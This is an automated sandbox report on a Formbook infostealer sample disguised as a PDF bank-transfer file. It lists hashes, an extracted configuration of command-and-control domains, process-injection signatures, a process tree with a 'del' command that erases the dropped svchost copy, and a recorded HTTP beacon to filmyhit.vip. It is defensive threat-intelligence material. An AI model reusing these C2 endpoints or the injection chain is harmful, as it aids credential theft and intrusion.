Analysis
max time kernel: 146s
max time network: 122s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
submitted: 27-09-2024 00:07
Static task: static1
Behavioral task: behavioral1
Sample: Bonifico2692024pdf.exe
Resource: win7-20240704-en
General
Target: Bonifico2692024pdf.exe
Size: 1.1MB
MD5: ab5a5fadd9a58b412281fa7c040c54ef
SHA1: d67c6a5fb65869cbb381c0a8276dea5e30ecfed1
SHA256: e4d1f88b5db146a70bce062886dd60b15d13bda9b325535ef4d3ffcb484981ec
SHA512: fd4144fccc27cab79fa9001e9847a65cc778f01c1d2311babc8982cd30c6ba4f2e85d8059f68b9111cfe103d29172dd40d4aadc6e29cb3db60a07e2af5d321f9
SSDEEP: 24576:PAHnh+eWsN3skA4RV1Hom2KXMmHara7ystgXDMSJA1p5:yh+ZkldoPK8Yara7y4S5Wl
Malware Config
Extracted
formbook
4.1
e23y
stiloeconforto.shop
79nn470gl.autos
ffg.autos
elix-saaac.buzz
tlasbet88win.sbs
inoliga.app
777.fun
avada-ga-3.press
avandakitchen.online
61ep864tr.autos
igitalonlineseva.online
ar-deals-15908.bond
sqqpkv.pro
368i8rnoy.xyz
lxspinsenin.lol
9y204r7eo.sbs
toptalkingaboutit.net
eeplab.xyz
filmyhit.vip
athroom-remodeling-59089.bond
hwqcoiu.xyz
ome-care-76206.bond
tudioalberto.online
anfocusedviews.shop
ibrarygym.online
emosjumpers.net
mg-marketing.online
19bet.xyz
7556r.club
sed-cars-35796.bond
liveiraeletro.online
iangshen56.cloud
aeempreendora.online
bets.net
sychology-degree-69585.bond
est-arthritis-therapy-9711.buzz
zkirv.top
8015.xyz
uwueriudsjkdjnfjkdjnkxzk.vip
etausaha.online
crubber-brush-64789.bond
iversitiendaplus.shop
wrzlak.buzz
b-999.top
ower-bank-za-4886348.world
2361.asia
believehim.net
leeconcerned.info
oland-flight-deal.today
c-marketing.net
wgxb.top
pboardresult.net
nitednationsofindia.net
oupondhakel.shop
elationship-coach-72450.bond
ounjaronaturaloferta.online
wpgs2448.vip
8080734.xyz
mvqimnpwkxcixccaeafmibpiq.top
arpediemwireless.net
eth-paaad.buzz
renvillemarianne.net
tephsmith.info
opinformation.net
reakinggroundtherapy.pro
Signatures

Formbook payload (3 IoCs)
  resource                                                                     yara_rule
  behavioral2/memory/1468-11-0x0000000000400000-0x000000000042F000-memory.dmp  formbook
  behavioral2/memory/1468-14-0x0000000000400000-0x000000000042F000-memory.dmp  formbook
  behavioral2/memory/3232-20-0x00000000004F0000-0x000000000051F000-memory.dmp  formbook

Suspicious use of SetThreadContext (3 IoCs)
  description                          pid   Process                 procid_target
  PID 5004 set thread context of 1468  5004  Bonifico2692024pdf.exe  82
  PID 1468 set thread context of 3472  1468  svchost.exe             56
  PID 3232 set thread context of 3472  3232  msdt.exe                56

Program crash (1 IoC)
  pid   pid_target  Process       procid_target
  3180  5004        WerFault.exe  81

System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Bonifico2692024pdf.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msdt.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe

Suspicious behavior: EnumeratesProcesses (60 IoCs)
  pid   Process
  1468  svchost.exe  (4 entries)
  3232  msdt.exe     (56 entries)

Suspicious behavior: MapViewOfSection (6 IoCs)
  pid   Process
  5004  Bonifico2692024pdf.exe  (1 entry)
  1468  svchost.exe             (3 entries)
  3232  msdt.exe                (2 entries)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description                       pid   Process
  Token: SeDebugPrivilege           1468  svchost.exe
  Token: SeShutdownPrivilege        3472  Explorer.EXE
  Token: SeCreatePagefilePrivilege  3472  Explorer.EXE
  Token: SeShutdownPrivilege        3472  Explorer.EXE
  Token: SeCreatePagefilePrivilege  3472  Explorer.EXE
  Token: SeDebugPrivilege           3232  msdt.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid   Process
  5004  Bonifico2692024pdf.exe  (2 entries)

Suspicious use of SendNotifyMessage (2 IoCs)
  pid   Process
  5004  Bonifico2692024pdf.exe  (2 entries)

Suspicious use of WriteProcessMemory (10 IoCs)
  description                       pid   Process                 procid_target
  PID 5004 wrote to memory of 1468  5004  Bonifico2692024pdf.exe  82  (4 entries)
  PID 3472 wrote to memory of 3232  3472  Explorer.EXE            86  (3 entries)
  PID 3232 wrote to memory of 4788  3232  msdt.exe                87  (3 entries)
Processes

C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  PID: 3472
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\Bonifico2692024pdf.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Bonifico2692024pdf.exe"
    PID: 5004
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\svchost.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Bonifico2692024pdf.exe"
      PID: 1468
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 684
      PID: 3180
      - Program crash

  C:\Windows\SysWOW64\msdt.exe
    command line: "C:\Windows\SysWOW64\msdt.exe"
    PID: 3232
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      command line: /c del "C:\Windows\SysWOW64\svchost.exe"
      PID: 4788
      - System Location Discovery: System Language Discovery

C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5004 -ip 5004
  PID: 2172
Network

Remote address: 8.8.8.8:53
Request: 241.150.49.20.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 83.210.23.2.in-addr.arpa IN PTR
Response: 83.210.23.2.in-addr.arpa IN PTR a2-23-210-83.deploy.static.akamaitechnologies.com

Remote address: 8.8.8.8:53
Request: 58.55.71.13.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 149.220.183.52.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 209.205.72.20.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 183.59.114.20.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 18.31.95.13.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: www.filmyhit.vip IN A
Response: www.filmyhit.vip IN A 46.175.150.247

GET http://www.filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzP
Process: Explorer.EXE
Remote address: 46.175.150.247:80
Request:
GET /e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzP HTTP/1.1
Host: www.filmyhit.vip
Connection: close
Response:
HTTP/1.1 301 Moved Permanently
Date: Fri, 27 Sep 2024 00:08:28 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: http://filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzP

Remote address: 8.8.8.8:53
Request: 247.150.175.46.in-addr.arpa IN PTR
Response: 247.150.175.46.in-addr.arpa IN PTR campers6ga

Remote address: 8.8.8.8:53
Request: www.reakinggroundtherapy.pro IN A
Response: (empty)

Remote address: 8.8.8.8:53
Request: 88.210.23.2.in-addr.arpa IN PTR
Response: 88.210.23.2.in-addr.arpa IN PTR a2-23-210-88.deploy.static.akamaitechnologies.com

Remote address: 8.8.8.8:53
Request: www.elationship-coach-72450.bond IN A
Response: (empty)

Remote address: 8.8.8.8:53
Request: 43.229.111.52.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: www.8015.xyz IN A
Response: (empty)

Remote address: 8.8.8.8:53
Request: www.777.fun IN A
Response: www.777.fun IN CNAME d2atqkubdsk7og.cloudfront.net

46.175.150.247:80  http://www.filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzP  http  Explorer.EXE  399 B  658 B  5  5
  HTTP Request: GET http://www.filmyhit.vip/e23y/?Ezrxu=9NElfXPu5ecZBRj7yXKDMGZSSmBmvFVpoUbMoZD6TZgeXSW70/jcbsqC9jyafvs+grBu&1bw=wHIhWlh8IzNXfpzP
  HTTP Response: 301

72 B  158 B  1  1
  DNS Request: 241.150.49.20.in-addr.arpa

70 B  133 B  1  1
  DNS Request: 83.210.23.2.in-addr.arpa

70 B  144 B  1  1
  DNS Request: 58.55.71.13.in-addr.arpa

73 B  147 B  1  1
  DNS Request: 149.220.183.52.in-addr.arpa

72 B  158 B  1  1
  DNS Request: 209.205.72.20.in-addr.arpa

72 B  158 B  1  1
  DNS Request: 183.59.114.20.in-addr.arpa

70 B  144 B  1  1
  DNS Request: 18.31.95.13.in-addr.arpa

62 B  78 B  1  1
  DNS Request: www.filmyhit.vip
  DNS Response: 46.175.150.247

73 B  98 B  1  1
  DNS Request: 247.150.175.46.in-addr.arpa

74 B  156 B  1  1
  DNS Request: www.reakinggroundtherapy.pro

70 B  133 B  1  1
  DNS Request: 88.210.23.2.in-addr.arpa

78 B  143 B  1  1
  DNS Request: www.elationship-coach-72450.bond

72 B  158 B  1  1
  DNS Request: 43.229.111.52.in-addr.arpa

58 B  123 B  1  1
  DNS Request: www.8015.xyz

57 B  167 B  1  1
  DNS Request: www.777.fun